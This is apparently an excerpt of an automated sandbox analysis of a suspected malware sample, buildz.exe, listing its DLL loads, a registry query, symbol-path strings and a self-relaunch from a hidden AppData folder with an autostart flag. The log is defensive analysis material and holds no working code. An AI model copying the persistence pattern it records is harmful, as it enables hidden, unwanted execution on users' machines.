          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeProcess created: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: drprov.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: ntlanman.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: davclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: davhlpr.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: browcli.dllJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: msimg32.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: dhcpcsvc.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: drprov.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: winsta.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: ntlanman.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: davclnt.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: davhlpr.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: wkscli.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: cscapi.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: browcli.dll
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeSection loaded: netapi32.dll
          Source: C:\Users\user\Desktop\buildz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\.pdb\p source: buildz.exe, 00000006.00000003.2866705786.000000000385D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: buildz.exe, 00000006.00000003.2725563548.0000000003146000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2439164862.0000000003146000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726652522.0000000003177000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726101777.0000000003175000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789829817.000000000315E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2829091548.0000000003163000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2830232221.000000000316F000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2817262340.0000000003156000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2505810794.000000000315E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790962184.0000000003177000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790419206.0000000003175000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2819937848.0000000003169000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2504691310.0000000003147000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2830146833.0000000003169000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2725563548.0000000003146000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726652522.0000000003177000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726243486.000000000313B000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726101777.0000000003175000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789829817.000000000315E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725563548.000000000311A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725945284.000000000312E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790348604.0000000003191000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error\aq source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.quallual01.txt.qualn1h2txyewy\ source: buildz.exe, 00000006.00000003.2902801314.0000000003180000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2903842838.0000000003197000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\.exe source: buildz.exe, 00000006.00000003.2790917732.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790773651.00000000037A7000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789619660.000000000373E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790278127.000000000378D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\licati source: buildz.exe, 00000006.00000003.2791259010.000000000310F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: buildz.exe, 00000006.00000003.2908778230.0000000003A5A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2918151256.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917779893.0000000003949000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917318091.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2920284157.0000000003A5B000.00000004.00000020.00020000.00000000.sdmp
